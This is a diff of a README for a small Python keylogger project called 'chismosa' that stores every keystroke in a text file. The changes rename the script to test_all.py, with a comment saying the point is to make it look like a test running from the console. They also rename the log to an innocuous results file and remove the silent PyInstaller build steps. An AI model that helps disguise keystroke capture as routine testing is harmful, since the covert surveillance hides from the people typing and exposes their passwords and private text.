martinciscap/chismosa/README.md

 ▶️ Usage

-python chismosa.py
+python test_all.py

-## To generate an executable (Windows):

-pip install pyinstaller
-pyinstaller --noconsole --onefile chismosa.py
+#yup(test_all.py) cause now the idea is to simule that there is a testing running up from console

 📄 Output
-All keystrokes are stored in registro_teclas.txt in the same directory.
+All keystrokes are stored in results_datetime.txt in the same directory.

 🧠 Why "Chismosa"?
 In Spanish, chismosa means someone who likes to gossip or knows everything about everyone — just like this script 👀